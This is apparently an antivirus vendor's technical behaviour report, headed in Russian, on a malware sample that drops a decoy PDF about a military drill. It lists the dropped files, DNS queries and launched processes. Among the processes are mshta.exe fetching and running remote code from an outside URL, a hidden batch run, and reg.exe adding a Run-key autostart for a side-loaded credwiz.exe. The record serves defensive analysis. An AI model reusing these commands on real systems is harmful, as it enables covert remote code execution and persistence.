Техническая информация
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Feedly' = '%ALLUSERSPROFILE%\Feedly\credwiz.exe'
- %ALLUSERSPROFILE%\update.js
- %TEMP%\instructions-on-discharge-drill-jcos-or.pdf
- %ALLUSERSPROFILE%\feedly\tempifile.txt
- %ALLUSERSPROFILE%\feedly\tempihta.hta
- %ALLUSERSPROFILE%\feedly\credwiz.exe
- %ALLUSERSPROFILE%\feedly\duser.dll
- %ALLUSERSPROFILE%\feedly\addreg.bat
- %TEMP%\feedly\windl.exe
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK di####cademy.com
- DNS ASK ip#.co.in
- DNS ASK microsoft.com
- '%WINDIR%\syswow64\wscript.exe' "%ALLUSERSPROFILE%\update.js"
- '%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\Feedly\addreg.bat" "' (со скрытым окном)
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "%TEMP%\INSTRUCTIONS-ON-DISCHARGE-DRILL-JCOs-OR.pdf"
- '%WINDIR%\syswow64\mshta.exe' https://dice-academy.com/new/media/docs/hww/css/index.php
- '%WINDIR%\syswow64\mshta.exe' "%ALLUSERSPROFILE%\Feedly\tempiHta.hta"
- '%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\Feedly\addreg.bat" "
- '%WINDIR%\syswow64\reg.exe' ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Feedly" /t REG_SZ /F /D "%ALLUSERSPROFILE%\Feedly\credwiz.exe"